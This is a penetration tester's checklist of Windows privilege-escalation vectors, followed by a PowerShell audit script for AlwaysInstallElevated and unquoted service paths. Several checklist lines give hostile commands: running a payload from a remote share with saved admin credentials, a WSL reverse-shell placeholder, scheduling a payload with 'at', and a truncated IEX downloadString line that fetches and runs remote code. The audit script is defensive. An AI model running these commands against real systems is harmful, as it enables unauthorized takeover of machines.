Privilege escalation is a crucial step in the penetration testing lifecycle. Through this checklist I intend to cover all the main vectors used in Windows privilege escalation, plus some of my personal notes from previous penetration tests.

- Perform basic information gathering steps: `systeminfo`, `whoami /all`, `net users`, `netstat -ano`, `ipconfig /all`, `tasklist`, etc.
- Check for files containing passwords or hashes: `type c:\sysprep.inf`, `%WINDIR%\Panther\Unattended.xml`, etc.
- Check for the "AlwaysInstallElevated" registry setting; if it is enabled, any user can install `*.msi` files as NT AUTHORITY\SYSTEM: `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`
- Check for weak permissions in the OS; these allow a service to be reconfigured so that it runs an arbitrary executable: `accesschk.exe -uwqs "Authenticated Users" *`
- If services have unquoted service paths, these can be used to run malicious executable files.
- Check for the SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege privileges; Juicy/Rotten Potato can be used to exploit these.
- Use the `runas` command to run commands as a privileged user with saved credentials: `cmdkey /list`, then `runas /savecred /user:WORKGROUP\Administrator "\\IP\SHARE\EVIL.exe"`
- Check if Windows Subsystem for Linux is enabled on the machine; if so, it can be used to get a bind/reverse shell: `wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'`
- Check the patch level to find kernel exploits: `wmic qfe get Caption,Description,HotFixID,InstalledOn`
- Use `findstr` with the KB patch numbers to display installed patches and see if any are missing.
- Check if we are a local admin; if so, we can escalate to NT SYSTEM.
- Check if we have access to the Startup folder; it can be used to run malicious executables: `icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"`
- Check for named pipes; these can be exploited to obtain the privileges of a process connecting to them: `::GetFiles("\\.\pipe\")`
- Create a scheduled task which will execute malicious code: `at 08:00 /interactive "C:\Windows\temp\Payload.exe"`
- Check for GUI apps running as SYSTEM that allow a user to spawn a Command Prompt or browse directories.
- Script used to check for common privilege escalation vulnerabilities on a target system: `winPEASany.exe`, `winPEASx64.exe`, `winPEASx86.exe`
- .NET tool designed to enumerate missing KBs and suggest exploits for privilege escalation vulnerabilities.
- Script that runs checks on all common areas of misconfiguration that allow a regular user to obtain a local administrative or SYSTEM account: `IEX(New-Object Net.Webclient).downloadString('`
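A defender-side audit for two of the misconfigurations on this checklist, AlwaysInstallElevated and unquoted service paths, written in PowerShell as an added example that is not part of the original post. It only reports each finding together with its fix, and assumes it is run from an elevated prompt so that every service's image path is readable.

```powershell
# Added hardening audit, not part of the original checklist. Reports the
# AlwaysInstallElevated policy and services with unquoted image paths,
# together with the remediation for each finding. Run from an elevated prompt.

function Test-AlwaysInstallElevated {
    # The policy only takes effect when the value is 1 in BOTH hives.
    $keys = @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
              'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    $values = foreach ($k in $keys) {
        (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    $enabled = (@($values | Where-Object { $_ -eq 1 }).Count -eq 2)
    $fix = if ($enabled) {
        'Disable "Always install with elevated privileges" under both Computer and User ' +
        'Configuration > Administrative Templates > Windows Components > Windows Installer'
    } else { 'none' }
    [pscustomobject]@{ Check = 'AlwaysInstallElevated'; Enabled = $enabled; Remediation = $fix }
}

function Get-UnquotedServicePath {
    # An unquoted image path whose executable part contains a space is
    # ambiguous to the Service Control Manager, so flag it for quoting.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path -match '^\s*"') { return }
        $exe = if ($path -match '^(.*?\.exe)') { $Matches[1] } else { $path }
        if ($exe -notmatch ' ') { return }
        [pscustomobject]@{
            Check       = 'UnquotedServicePath'
            Service     = $_.Name
            ImagePath   = $path
            # Quote the executable and keep any arguments outside the quotes.
            Remediation = ('sc.exe config "{0}" binPath= "\"{1}\"{2}"' -f
                           $_.Name, $exe, $path.Substring($exe.Length))
        }
    }
}

Test-AlwaysInstallElevated | Format-List
Get-UnquotedServicePath | Format-List
```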